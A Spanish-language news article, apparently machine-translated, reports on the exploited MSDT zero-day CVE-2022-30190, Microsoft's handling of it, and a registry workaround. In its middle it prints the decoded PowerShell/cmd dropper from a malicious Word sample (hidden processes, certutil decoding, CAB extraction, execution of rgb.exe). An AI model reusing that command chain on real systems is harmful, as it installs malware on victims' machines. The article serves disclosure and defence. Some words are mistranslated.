Un día cero de ejecución de código crítico en todas las versiones compatibles de Windows ha estado bajo explotación activa durante siete semanas, lo que brinda a los atacantes un medio confiable para instalar malware sin activar Windows Defender y una lista de otros productos de protección de puntos finales.
La vulnerabilidad de la herramienta de diagnóstico de soporte de Microsoft se informó a Microsoft el 12 de abril como un día cero que ya estaba siendo explotado en la naturaleza, investigadores de Grupo Cazador de Sombras dijo en Gorjeo. A respuesta del 21 de abrilsin embargo, informó a los investigadores que el equipo del Centro de respuestas de seguridad de Microsoft no consideró el comportamiento informado como una vulnerabilidad de seguridad porque, supuestamente, la herramienta de diagnóstico MSDT requería una contraseña antes de ejecutar cargas útiles.
no importa
El lunes, Microsoft cambió de rumbo, identificando el comportamiento con el rastreador de vulnerabilidades CVE-2022-30190 y advertencia por primera vez que el comportamiento informado constituía una vulnerabilidad crítica después de todo.
“Existe una vulnerabilidad de ejecución remota de código cuando se llama a MSDT utilizando el protocolo URL desde una aplicación de llamada como Word”, indicó el aviso. “Un atacante que explota con éxito esta vulnerabilidad puede ejecutar código arbitrario con los privilegios de la aplicación que llama. El atacante puede luego instalar programas, ver, cambiar o eliminar datos, o crear nuevas cuentas en el contexto permitido por los derechos del usuario”.
En el momento de la publicación de esta historia, Microsoft aún no había publicado un parche. En cambio, estaba aconsejando a los clientes que deshabilitaran el protocolo URL de MSDT al:
- Correr Símbolo del sistema como Administrador.
- Para hacer una copia de seguridad de la clave de registro, ejecute el comando “reg export HKEY_CLASSES_ROOT\ms-msdt Nombre del archivo“
- Ejecute el comando “reg delete HKEY_CLASSES_ROOT\ms-msdt /f”
Aunque inicialmente Microsoft la pasó por alto, la vulnerabilidad se detectó nuevamente cuando un investigador identificado un documento de Word subido a VirusTotal el viernes que explotó el vector de ataque previamente desconocido.
De acuerdo a análisis del investigador Kevin Beaumont, el documento utiliza Word para recuperar un archivo HTML de un servidor web remoto. Luego, el documento usa el esquema de URI de MSProtocol para cargar y ejecutar comandos de PowerShell.
“Eso no debería ser posible”, escribió Beaumont.
Desafortunadamente, es posible.
Cuando se decodifican los comandos en el documento, se traducen a:
$cmd = "c:\windows\system32\cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&&for /r
%temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";
Según el investigador John Hammond de empresa de seguridad cazadorala secuencia de comandos:
- Inicia ventanas ocultas para:
- Matar msdt.exe si se está ejecutando
- Recorra los archivos dentro de un archivo RAR, buscando una cadena Base64 para un archivo CAB codificado
- Guarde este archivo CAB codificado en Base64 como 1.t
- Descodifique el archivo CAB codificado en Base64 para guardarlo como 1.c
- Ampliar la 1.c archivo CAB en el directorio actual, y finalmente:
- Ejecutar rgb.exe (presumiblemente comprimido dentro del archivo 1.c CAB)
Beaumont también llamó la atención sobre este trabajo académico, que en agosto de 2020 mostró cómo usar MSDT para ejecutar código. Eso sugiere que hubo al menos otra ocasión en que el equipo de seguridad de la empresa no logró captar el potencial de este comportamiento para ser explotado maliciosamente.
No, la vista protegida no lo salvará
Normalmente, Word está configurado para cargar contenido descargado de Internet en lo que se conoce como vista protegida, un modo que desactiva macros y otras funciones potencialmente dañinas. Por razones que no están claras, dijo Beaumont, si el documento se carga como un archivo de formato de texto enriquecido, “se ejecuta sin siquiera abrir el documento (a través de la pestaña de vista previa en el Explorador) y mucho menos la Vista protegida.
En otras palabras, escribieron los investigadores de Huntress, el archivo RTF puede “activar la invocación de este exploit con solo el Panel de vista previa dentro del Explorador de Windows”. Al hacerlo, “esto amplía la gravedad de esta amenaza no solo con un ‘clic único’ para explotar, sino potencialmente con un desencadenante de ‘clic cero'”.
Además del documento subido a VirusTotal el viernes, los investigadores descubrieron un archivo de Word separado subido el 12 de abril que explota el mismo día cero.
Dada la gravedad de esta vulnerabilidad sin parches, las organizaciones que confían en Microsoft Office deberían investigar a fondo cómo afecta a sus redes. No es probable que deshabilitar el protocolo URL de MSDT genere interrupciones importantes a corto plazo y posiblemente a largo plazo. Mientras investigan, al menos hasta que Microsoft publique más detalles y orientación, los usuarios de Office deben desactivar el protocolo por completo y examinar cualquier documento descargado a través de Internet.